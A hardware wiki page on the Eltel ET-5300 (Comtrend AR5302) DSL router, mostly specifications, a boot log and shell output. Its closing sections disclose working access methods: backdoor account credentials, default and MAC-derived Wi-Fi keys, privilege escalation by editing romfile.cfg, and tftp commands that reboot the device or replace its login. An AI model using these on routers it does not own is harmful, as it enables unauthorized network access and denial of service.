Eltel ET-5300

From WikiDevi.Wi-Cat.RU
Jump to navigation Jump to search

Eltel ET5300 V1

Manuf (OEM/ODM): Comtrend AR5302

Country of manuf.: China

Type: wireless router, dsl modem

Power: 12 VDC, 1 A
Connector type: barrel

CPU1: Ralink RT63365E (500 MHz)
FLA1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (Macronix MX25L6406E)
RAM1: 32 MiB33,554,432 B <br />262,144 Kib <br />32,768 KiB <br />256 Mib <br />0.0313 GiB <br /> (EtronTech EM6AA160TSB-5G)

Expansion IFs: none specified

WI1 chip1: Ralink RT5390HL
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL

ETH chip1: Ralink RT63365E
Switch: Ralink RT63365E
LAN speed: 100M
LAN ports: 4
WAN speed: 100M
WAN ports: 1

bgn

Additional chips
DSL AFE;Ralink;RT63087N;

Stock FW OS: Linux 2.6.22.15 TrendChip

Default SSID: TURBONETT_XXXXXX
Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1304 additional devices
of which 0 are Eltel devices
Default login user: admin
Default login password: c1@r0

802dot11 OUI: F8:8E:85 (2 E, 2 W)
Ethernet OUI: F8:8E:85 (2 E, 2 W)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.

This router is distributed by Claro in large numbers. Manufactured by Comtrend according IEEE Standards MA-L database.

Links

Product page

Datasheet
User Manual of similar Upvel UR-314AN (TrendChip firmware)

Components

EM6AA160TSB-5G datasheet
MX25L6406E datasheet

Board, headers, etc

The board layout is somewhat similar to Upvel UR-314AN, Upvel UR-354AN4G (with USB), Huawei HG532s, ZTE ZXHN H108L, and Edimax AR-7186. Silk screen says E241819 50XX13-350.

  • J521 is likely the serial interface.
  • The circuit board is prepared for an USB connector (J500). Needs an additional 5V regulator (U601).

Images

from User:Zerohero

  • Full view

  • Front view

  • Back view

  • Botton view & label

  • Screenshot device status

  • Screenshot LAN defaults

  • Screenshot WLAN defaults

  • Screenshot SSID2-4 defauls

  • Board top side

  • Top side ADSL & WLAN chip

  • Top side CPU/switch & RAM

  • Top side USB artwork

  • Board bottom side

  • Bottom side flash

Info

Bootlog

# cat /proc/kmsg 
<5>Linux version 2.6.22.15 (root@linux.local) (gcc version 4.3.4 (GCC) ) #11 SMP Tue Apr 2 09:57:08 CST 2013
<6>ISPRAM0: PA=00260000,Size=00008000,enabled
<4>Enable SRAM=1c000001
<4>Ralink RT63365 SOC prom init
<4>[DEBUG]Fix eth led for AR-5300
<4>CPU revision is: 00019555
<4>Determined physical RAM map:
<4> memory: 02000000 @ 00000000 (usable)
<7>On node 0 totalpages: 8192
<7>  Normal zone: 64 pages used for memmap
<7>  Normal zone: 0 pages reserved
<7>  Normal zone: 8128 pages, LIFO batch:0
<4>3 available secondary CPU TC(s)
<4>Built 1 zonelists.  Total pages: 8128
<5>Kernel command line: console=ttyS0 rootfstype=squashfs es=1
<4>Primary instruction cache 64kB, physically tagged, 4-way, linesize 32 bytes.
<4>Primary data cache 32kB, 4-way, linesize 32 bytes.
<6>Synthesized TLB refill handler (23 instructions).
<6>Synthesized TLB load handler fastpath (37 instructions).
<6>Synthesized TLB store handler fastpath (37 instructions).
<6>Synthesized TLB modify handler fastpath (36 instructions).
<6>Cache parity protection disabled
<4>PID hash table entries: 128 (order: 7, 512 bytes)
<4>CPU frequency 498.00 MHz
<4>Using 250.000 MHz high precision timer.
<6>console handover: boot [early0] -> real [ttyS0]
<4>Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
<4>Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
<6>Memory: 29276k/32768k available (2338k kernel code, 3492k reserved, 346k data, 148k init, 0k highmem)
<6>SLUB: Genslabs=17, HWalign=32, Order=0-1, MinObjects=4, CPUs=4, Nodes=1
<7>Calibrating delay loop... 332.59 BogoMIPS (lpj=1662976)
<4>Mount-cache hash table entries: 512
<4>34K sync es set to 1.
<4>Config7: 0x80080500
<4>FPU Affinity set after 1105 emulations
<4>Limit of 4 TCs set
<4>TLB of 64 entry pairs shared by 2 VPEs
<4>VPE 0: TC 0 1 2, VPE 1: TC 3
<4>IPI buffer pool of 32 buffers
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 1 going on-line as CPU 1
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 2 going on-line as CPU 2
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.03 BogoMIPS (lpj=1245184)
<4>TC 3 going on-line as CPU 3
<6>Brought up 4 CPUs
<4>migration_cost=10000
<6>NET: Registered protocol family 16
<4>RT63365_pcie_init
<4>registering PCI controller with io_map_base unset
<6>PCI: Bridge: 0000:00:00.0
<6>  IO window: disabled.
<6>  MEM window: 20000000-200fffff
<6>  PREFETCH window: disabled.
<4>PCI: Enabling device 0000:00:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:00:00.0 to 64
<6>NET: Registered protocol family 8
<6>NET: Registered protocol family 20
<6>NET: Registered protocol family 2
<6>Time: MIPS clocksource has been installed.
<4>IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
<4>TCP established hash table entries: 1024 (order: 1, 12288 bytes)
<4>TCP bind hash table entries: 1024 (order: 1, 8192 bytes)
<6>TCP: Hash tables configured (established 1024 bind 1024)
<6>TCP reno registered
<6>squashfs: version 3.0 (2006/03/15) Phillip Lougher
<6>io scheduler noop registered (default)
<6>ttyS0 at I/O 0xbfbf0003 (irq = 1) is a TC3162
<6>PPP generic driver version 2.4.2
<6>PPP Deflate Compression module registered
<6>PPP BSD Compression module registered
<6>NET: Registered protocol family 24
<6>IMQ starting with 2 devices...
<6>IMQ driver loaded successfully.
<6>	Hooking IMQ after NAT on PREROUTING.
<6>	Hooking IMQ before NAT on POSTROUTING.
<4>tc3162: flash device 0x01000000 at 0x10000000
<6>tc3162: Found SPIFLASH 8MiB MX25L6405D
<5>Creating 7 MTD partitions on "tc3162":
<5>0x00000000-0x00010000 : "bootloader"
<5>0x00010000-0x00020000 : "romfile"
<5>0x00020000-0x00104c6f : "kernel"
<4>mtd: partition "kernel" doesn't end on an erase block -- force read-only
<5>0x00104c6f-0x004c6c6f : "rootfs"
<4>mtd: partition "rootfs" doesn't start on an erase block boundary -- force read-only
<5>0x00020000-0x007c0000 : "tclinux"
<5>0x007c0000-0x00800000 : "reservearea"
<5>0x00000000-0x00800000 : "total_flash"
<4>RT3xxx EHCI/OHCI init.
<4>Netfilter messages via NETLINK v0.30.
<4>nf_conntrack version 0.5.0 (256 buckets, 2048 max)
<4>ctnetlink v0.93: registering with nfnetlink.
<4>nf_conntrack_rtsp v0.6.21 loading
<4>nf_nat_rtsp v0.6.21 loading
<4>ip_tables: (C) 2000-2006 Netfilter Core Team
<6>TCP cubic registered
<6>Initializing XFRM netlink socket
<6>NET: Registered protocol family 1
<6>NET: Registered protocol family 10
<6>lo: Disabled Privacy Extensions
<6>IPv6 over IPv4 tunneling driver
<6>sit0: Disabled Privacy Extensions
<6>NET: Registered protocol family 17
<6>NET: Registered protocol family 15
<6>802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
<6>All bugs added by David S. Miller <davem@redhat.com>
<4>VFS: Mounted root (squashfs filesystem) readonly.
<6>Freeing unused kernel memory: 148k freed
<4>module_sel: module license 'unspecified' taints kernel.
<4>
<4>tcfullcone version: tcfullcone V1.1.0.0 (Mar  5 2012-08:25:25).
<4>TC3162 LED Manager 0.1 init
<4>
<4>tcledctrl version: tcledctrl V1.1.0.0 (Apr  2 2013-09:57:18).
<4>tccicmd V1.1.0.0 (Apr  2 2013-09:57:20)
<4>Adapter_Interrupts_Init: Successfully hooked IRQ 29
<4>
<4>Adapter_Interrupts_Init: call back registeredAdapter_EIP93_Init: CmdRing_Handle=81860ffc
<4>Adapter_EIP93_Init: ResRing_Handle=81860ff8
<4>Adapter: Successfully initialized EIP93v2 in ARM mode
<4>PEC_Init: PRNG is initialized
<6>femac.c:v1.00-NAPI 29.Mar.2011
<6>eth0: FE MAC Ethernet address: F8:8E:85:9C:5E:F4
<4>TSARM: TC3162 ATM SAR driver 1.5 init
<4>
<4>tc3162sar V1.2.0.0 (Apr  2 2013-09:57:16)
<4>register autopvc cmd to sys
<4>TSARM: TC3162 ATM SAR driver 1.5 done
<4>ADSL DMT initialization starting
<4>Begin AdslTaskInit.....
<4>End AdslTaskInit
<4>Begin to  request IRQ 20
<4>DMT:Succeed to request IRQ 20
<4>Initializing ADSL F/W 3.20.6.0 ......
<4>Initializing ADSL F/W ........ done 
<4>ADSL HW version: b2, HCLK 166
<4>largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
<4>SRAON
<4>up right away
<4>
<4>tcsmux version: tcsmux V1.1.0.0 (Mar  5 2012-08:25:29).
<4>
<4>tcportbind version: tcportbind V1.1.0.0 (Mar  5 2012-08:25:32).
<4>vlantag_drv_init
<4>the number of cfg node is 68
<4>portbind_init
<4>autopvc_init
<4>logAccess_init LanguageSwitch_init vendorCfgFile_init The number of cache node is 5
<4>WPSActiveStatus = NULL
<4>WPSOOBActive = NULL
<4>ReCounterActive = NULL
<4>WPSGenPinCode = NULL
<4>sslca_write:get Frag Number failed!
<4>The attribute is not in wifiMACTab
<4>
<4>lanHost_read: Create node LanHost !
<4>The remaining IMEM space cannot accommodate section .text.imem !!
<4>Remaining IMEM space: -2280 bytes	Section Size: 728 bytes
<4>PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:01:00.0 to 64
<4>Mirror/redirect action on
<5>Ebtables v2.0 registered
<4>igmpsnoop V1.1.0.0 (Mar  5 2012-08:25:26)
<4>
<4>mldsnooping V1.1.0.0 (Mar  5 2012-08:25:28)
<6>eth0: starting interface.
<4>alloc_sram p=bc000800 free=7800
<4>alloc_sram p=bc002800 free=5800
<4>[macInit:2049]Fix eth led for AR-5300
<4>TC2105MJ, <6>Ralink HW NAT Module Enabled
<6>device eth0 entered promiscuous mode
<4>0x1300 = 00064380
<4>jiffies=ffff9274, POLLING_MODE_DETECT_INTV=300
<6>device ra0 entered promiscuous mode
<6>device ra1 entered promiscuous mode
<6>device ra2 entered promiscuous mode
<6>device ra3 entered promiscuous mode
<4>
<4>Enabling SSL security system
<4>SSL security system enabled<7>eth0.1: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.1: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.2: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.2: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.3: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.3: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.4: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.4: add 01:00:5e:00:00:01 mcast address to master interface
<6>device eth0 left promiscuous mode
<6>br0: port 1(eth0) entering disabled state
<4>ANNEXAIJLM
<4>========================insmod iptable_filter=======================
<6>br0: port 9(eth0.4) entering learning state
<6>br0: port 8(eth0.3) entering learning state
<6>br0: port 7(eth0.2) entering learning state
<6>br0: port 6(eth0.1) entering learning state
<6>br0: port 5(ra3) entering learning state
<6>br0: port 4(ra2) entering learning state
<6>br0: port 3(ra1) entering learning state
<6>br0: port 2(ra0) entering learning state
<6>br0: topology change detected, propagating
<6>br0: port 9(eth0.4) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 8(eth0.3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 7(eth0.2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 6(eth0.1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 5(ra3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 4(ra2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 3(ra1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 2(ra0) entering forwarding state
<4>Radvd function activated!
<4>Enter set first loop, IP addr by radvd
<4>dhcp6s parameter activated by exec!
<4>read WLAN driver from rt_device failed,set with default value!
<4>
<4>Enter cwmp boot, we will start tr69 Process
<4>Parental Control: parental_execute() Enter.
<4>[discovery:613]ifName=nas2, 88:43:e1:07:56:18:55679
<6>br0: starting userspace STP failed, staring kernel STP
<4>Link State: LAN_1 up.
<4>Failed to ioctl br0:0
<7>nas0: no IPv6 routers present
<4>ThreadedTimerCheck: get last for first time
<4>Failed to ioctl br0:0
<7>nas2: no IPv6 routers present

Bootloader

# cfeversion
1.0-004

Strings extracted from bootloader partition: 

# cat /dev/mtd0
BootVer:1.0-004
TrendChip Technologies Corp.
ADSL Modem
admin
1234
AR-5302

Firmware

# version
T111-73376CAR-C01_R10

Model

# model
AR-5302

Board ID

# boardid
Board ID = AR-5302

Operating system

# uname -a
Linux tc 2.6.22.15 #11 SMP Tue Apr 2 09:57:08 CST 2013 mips unknown

Build

# build
Build Time: Apr 02 2013 10:04:17

Modules

# cat /proc/modules 
ipt_REDIRECT 800 2 - Live 0xc0156000
iptable_filter 1024 1 - Live 0xc0150000
hw_nat 50256 0 - Live 0xc018a000 (P)
mldsnooping 5088 0 - Live 0xc0158000
igmpsnoop 12256 0 - Live 0xc015b000
ebtable_nat 1024 1 - Live 0xc014e000
ebtable_broute 832 1 - Live 0xc009d000
ebt_ip6 2496 0 - Live 0xc0083000
ebt_ip 1952 0 - Live 0xc0099000
ebtable_filter 992 0 - Live 0xc0081000
ebtables 19744 5 ebtable_nat,ebtable_broute,ebt_ip6,ebt_ip,ebtable_filter, Live 0xc0075000
sch_prio 3744 2 - Live 0xc0059000
sch_htb 15328 0 - Live 0xc007c000
cls_fw 3392 2 - Live 0xc0057000
act_mirred 2704 2 - Live 0xc0055000
rt5390ap 815936 4 - Live 0xc028a000 (P)
brg_shortcut 4816 0 - Live 0xc002a000 (P)
tcvlantag 10080 0 - Live 0xc0071000
tcportbind 3856 0 - Live 0xc0039000
tcsmux 8912 0 - Live 0xc006d000
tc3162_dmt 820720 0 [permanent], Live 0xc01c0000 (P)
tc3162l2sar 61568 2 - Live 0xc0088000 (P)
raeth 58400 2 tc3162_dmt,tc3162l2sar, Live 0xc0042000 (P)
crypto_k 28000 0 - Live 0xc0031000 (P)
tccicmd 67232 4 rt5390ap,tc3162_dmt,tc3162l2sar,raeth, Live 0xc005b000 (P)
tcledctrl 20736 4 rt5390ap,tc3162l2sar,raeth,tccicmd, Live 0xc003b000 (P)
tcfullcone 2160 0 - Live 0xc002f000
module_sel 1312 4 rt5390ap,tcvlantag,tcportbind,tcsmux, Live 0xc002d000 (P)

MTD's

# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00010000 00010000 "bootloader"
mtd1: 00010000 00010000 "romfile"
mtd2: 000e4c6f 00010000 "kernel"
mtd3: 003c2000 00010000 "rootfs"
mtd4: 007a0000 00010000 "tclinux"
mtd5: 00040000 00010000 "reservearea"
mtd6: 00800000 00010000 "total_flash"

Filesystems

# cat /proc/filesystems
nodev	rootfs
nodev	bdev
nodev	proc
nodev	sockfs
nodev	pipefs
nodev	anon_inodefs
nodev	futexfs
nodev	tmpfs
nodev	devpts
	squashfs
nodev	ramfs

Mounts

# cat /proc/mounts   
rootfs / rootfs rw 0 0
/dev/root / squashfs ro 0 0
proc /proc proc rw 0 0
ramfs /tmp ramfs rw 0 0
devpts /dev/pts devpts rw 0 0

IOmem

# cat /proc/iomem  
00000000-01ffffff : System RAM
  00020000-002688e7 : Kernel code
  002688e8-002bf19f : Kernel data
1fba0000-1fbaffff : rt3xxx-ohci
1fbb0000-1fbbffff : rt3xxx-ehci
20000000-2fffffff : pcie memory space
  20000000-200fffff : PCI Bus #01
    20000000-2000ffff : 0000:01:00.0
      20000000-2000ffff : 0000:01:00.0

IOports

# cat /proc/ioports
1f600000-1f61ffff : pcie IO space

CPU's

# cat /proc/cpuinfo
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 1
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.85
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 2
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.85
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

processor		: 3
cpu model		: MIPS 34K V5.5
BogoMIPS		: 249.03
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
shadow register sets	: 1
VCED exceptions		: not available
VCEI exceptions		: not available
unaligned accesses	: 227088

Interrupts

# cat /proc/interrupts
           CPU0       CPU1       CPU2       CPU3       
  1:       4717      10601       1043          0            MIPS  TC3162 UART
  9:         84         11        546       1158            MIPS  SMTC_IPI
 10:          0          0          0          0            MIPS  watchdog
 14:          0          0          0          0            MIPS  performance
 20:    1259488    1817925      92279          0            MIPS  dmt20
 22:          0          0          0       2632            MIPS  eth0
 23:          0          0          0          0            MIPS  TSARM
 25:      23156      34192       1825          0            MIPS  ra0
 29:          0          0          0          0            MIPS  safenet-vdriver-eip93
 31:     204088      41065       6946     251974            MIPS  timer
 33:          0          0          0          0            MIPS  bus timeout

ERR:          0

LAN MAC

# mac
MAC Addr: F8:8E:85:9C:5E:F4

Netstat

# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 *:5555                  *:*                     LISTEN      
tcp        0      0 *:domain                *:*                     LISTEN      
tcp        0      0 *:ssh                   *:*                     LISTEN      
tcp        0      0 *:7547                  *:*                     LISTEN      
tcp        0      0 192.168.1.1:ssh         192.168.1.2:58897       ESTABLISHED 
tcp        0      0 *:http                  *:*                     LISTEN      
tcp        0      0 *:ftp                   *:*                     LISTEN      
tcp        0      0 *:domain                *:*                     LISTEN      
tcp        0      0 *:telnet                *:*                     LISTEN      
tcp        0      0 *:https                 *:*                     LISTEN      
udp        0      0 *:sd                    *:*                                 
udp        0      0 *:domain                *:*                                 
udp        0      0 *:bootps                *:*                                 
udp        0      0 *:1900                  *:*                                 
udp        0      0 *:32768                 *:*                                 
udp        0      0 *:dhcpv6-server         *:*                                 
udp        0      0 *:domain                *:*                                 
udp        0      0 *:tftp                  *:*                                 
raw        0      0 *:58                    *:*                     0           
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     523    /tmp/tcapi_sock
unix  2      [ ]         DGRAM                    2107   
unix  3      [ ]         STREAM     CONNECTED     2089   
unix  3      [ ]         STREAM     CONNECTED     2088   
unix  2      [ ]         STREAM     CONNECTED     1288   
unix  2      [ ]         STREAM     CONNECTED     1284   /tmp/tcapi_sock

Portscan (from Internet)

$ nmap -sS xx.xx.xx.xx
Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 19:04 CDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.44s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   open     domain
80/tcp   filtered http
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
161/tcp  filtered snmp
443/tcp  open     https
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
4444/tcp filtered krb524
5555/tcp open     freeciv

Nmap done: 1 IP address (1 host up) scanned in 32.65 seconds

Stimulating port 5555 (from Internet)

$ nc xx.xx.xx.xx 5555
get

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, POST, PUT
Content-Length: 0
Server: RomPager/4.07 UPnP/1.0

See Wikipedia: Universal_Plug_and_Play Access_from_the_Internet
and Full Disclosure: RomPager/4.07 UPnP/1.0. Issue: A reboot can be caused when a special crafted http request is sent

Processes

# ps
  PID  Uid     VmSize Stat Command
    1 admin       452 S   init       
    2 admin           SW< [kthreadd]
    3 admin           SW< [migration/0]
    4 admin           SWN [ksoftirqd/0]
    5 admin           SW< [migration/1]
    6 admin           SWN [ksoftirqd/1]
    7 admin           SW< [migration/2]
    8 admin           SWN [ksoftirqd/2]
    9 admin           SW< [migration/3]
   10 admin           SWN [ksoftirqd/3]
   11 admin           SW< [events/0]
   12 admin           SW< [events/1]
   13 admin           SW< [events/2]
   14 admin           SW< [events/3]
   15 admin           SW< [khelper]
   16 admin           SW< [kblockd/0]
   17 admin           SW< [kblockd/1]
   18 admin           SW< [kblockd/2]
   19 admin           SW< [kblockd/3]
   20 admin           SW  [pdflush]
   21 admin           SW  [pdflush]
   22 admin           SW< [kswapd0]
   23 admin           SW< [aio/0]
   24 admin           SW< [aio/1]
   25 admin           SW< [aio/2]
   26 admin           SW< [aio/3]
   27 admin           SW< [mtdblockd]
   94 admin           SW< [dmtd]
  144 admin      1300 S   /userfs/bin/cfg_manager 
  146 admin      1300 S   /userfs/bin/cfg_manager 
  147 admin      1300 S   /userfs/bin/cfg_manager 
  318 admin           SW  [RtmpCmdQTask]
  319 admin           SW  [RtmpWscTask]
  368 admin       216 S   tcwdog -t 1 /dev/watchdog 
  372 admin       144 S   utelnetd -l /bin/login -d 
  379 admin       676 S   /userfs/bin/boa -c /boaroot -d 
  677 admin       304 S   br2684ctl -c 0 -e 0 -t ubr -p 0 -a 0.0.32 
  691 admin       632 S   pppd unit 0 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas0 defaultroute noipdefault persist mtu 1492 mru 1492 
  787 admin       304 S   br2684ctl -c 2 -e 0 -t ubr -p 0 -a 0.0.45 
  801 admin       636 S   pppd unit 2 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas2 defaultroute noipdefault persist mtu 1492 mru 1492 
 1007 admin       440 S   /userfs/bin/radvd -C /etc/radvd.conf -p /var/run/radvd.pid 
 1015 admin       452 S   /userfs/bin/dhcp6s -c /etc/dhcp6s.conf br0 -p /var/run/dhcp6s.pid 
 1039 admin       420 S   /usr/sbin/udhcpd 
 1049 admin       424 S   /userfs/bin/dnsmasq 
 1053 admin      1224 S   /userfs/bin/tr69 
 1235 admin       312 S   /userfs/bin/inetd 
 1248 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1249 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1250 admin       180 R   /userfs/bin/tftpd 
 1251 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf 
 1256 admin      1224 S   /userfs/bin/tr69 
 1257 admin      1224 S   /userfs/bin/tr69 
 1279 admin       332 S   init       
 1508 admin       616 R   /userfs/bin/dropbear -i 
 1513 admin       492 R   -sh

DNSmasq

# dnsmasq --version
Dnsmasq version 2.52  Copyright (c) 2000-2010 Simon Kelley
Compile time options IPv6 GNU-getopt no-RTC no-DBus no-I18N no-DHCP no-TFTP

Dropbear

# dropbear -v       
Unknown argument -v
Dropbear sshd v0.52

EBtables

# ebtables --version
ebtables v2.0.8-2 (May 2007)

Wireless access

In the following description XXXXX stands for the last 3 octets (in upper case) of LAN MAC (e.g. LAN MAC=F8:8E:85:9C:5E:F4 --> XXXXXX=9C5EF4). WLAN MAC is +1 (e.g. F8:8E:85:9C:5E:F5). WAN MAC is +2 (e.g. F8:8E:85:9C:5E:F6).

  • Default SSID: TURBONETT_XXXXXX (e.g. TURBONETT_9C5EF4)
  • Default WEP key: Made of last 5 octets (in uppercase) of LAN MAC. Can be easily constructed as OUI is always F8:8E:85 (e.g. WEP key=8E859C5EF4).

The router supports 4 WLAN's in total. By default SSID2-4 are hidden but active (see screenshots), and can be identified by a specific OUI. SSID2-4 credentials are rarely changed by users, and wireless acccess is gained easily as defaults are straightforward!

WLAN2

  • Default SSID: TURBONETT_XXXXXX-1 (e.g. TURBONETT_9C5EF4-1)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: FA:8E:85

WLAN3

  • Default SSID: TURBONETT_XXXXXX-2 (e.g. TURBONETT_9C5EF4-2)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: FE:8E:85

WLAN4

  • Default SSID: TURBONETT_XXXXXX-3 (e.g. TURBONETT_9C5EF4-3)
  • Default WPA/WPA2 passphrase: 1234567890
  • OUI: 02:8E:85

Router login

Login to the ET-5300 is possible using the following protocols.

  • Web interface: http and https (invalid certificate)
  • Console login: telnet and ssh
  • File transfer: tftp and ftp (root directory is /var/tmp)

Many routers distributed by the Claro company use a standard default login, and the ET-5300 is no exception.

  • Default username: admin
  • Default password: c1@r0

The ET-5300 supports 3 login names in total, but only the password for login1 (admin) can be changed in the web interface.

The following credentials for login2 and login3 are taken from the romfile.cfg;
login3 works for the web interface (on a subset of functionallity) and console ssh login!

Login2

  • Username: qwertyuiop
  • Password: 1234567890

Login3

  • Username: user3
  • Password: 1234567890

(P.S. The Sitecom WLM-3500 is affected by the same backdoor accounts [1].

Another candidate might be the Aztech DSL5001EN [2]).

Romfile

The router's configuration can be saved to the XML formatted romfile.cfg (web interface: Maintenance >> Firmware >> Configuration Backup or simply http://192.168.1.1/romfile.cfg). Editing and then restoring the romfile.cfg offers extended configuration possibilities. Here are some ideas...

Login Credentials

As described above, login2 and login3 have some impractical usernames and passwords. This can be corrected by modifing the parameters of Entry1 and Entry2 (think of better passwords then in this example). The new credentials do work for the web interface and console ssh logins! 

<Entry1
    username="user2"
    web_passwd="1234"

<Entry2
    username="user3"
    web_passwd="1234"

Display Mask

Logging in as user2 or user3 offers a web interface with reduced menu / permission:

  • Reduced menu user2

  • Reduced menu user3

Note that for both users the Firmware menu is still accessible which means one can still backup/restore the router's configuration. This allows user2 and user3 to gain full permission! As seen in the romfile.cfg, permissions are defined by the so called display_mask: 

<Entry0
    display_mask="DF FF F7 BF FF DF FF FF FF"
<Entry1
    display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C"
<Entry2
    display_mask="5E 8C 6 8C 8C 8C 8C 8C 8C"

In the following example display_mask of user3 is not just copied from admin, but set to the maximum possible value. Surprisingly this reveals an additional Advanced Wireless menu as seen in the screenshots bellow! 

<Entry2
    username="user3"
    web_passwd="1234"
    display_mask="FF FF FF FF FF FF FF FF FF"

  • Advanced wireless menu

  • Advanced wireless basic

  • Advanced wireless advanced

  • Advanced Wireless WiFi multimedia

  • Adanced wireless statistics

Vulnerabilities

Uploading any file of any size by tftp or ftp reboots the router! 

$ echo "text" > file
$ tftp 192.168.1.1
tftp> put file
Sent 6 bytes in 13.9 seconds

$ ftp 192.168.1.1
220 bftpd 2.2 at 192.168.1.1 ready.
Name (192.168.1.1:xxx): admin
331 Password please.
Password: *****
230 User logged in.
ftp> put file
local: file remote: file
200 PORT 192.168.1.100:44443 OK
150 BINARY data connection established.
The firmware is illegal!!
6 bytes sent in 0.00 secs (1813.6 kB/s)

Uploading a modified romfile.cfg via tftp allows arbitrary login. The Sent NNNNN bytes in NN seconds message should appear, otherwise the romfile was not accepted (although the router reboots). 

<Account>
  <Entry0 username="admin" web_passwd="stardust" console_passwd="stardust"

$ tftp 192.168.1.1
tftp> put romfile.cfg
Sent 29121 bytes in 13.5 seconds
Retrieved from "https://wikidevi.wi-cat.ru/index.php?title=Eltel_ET-5300&oldid=335734"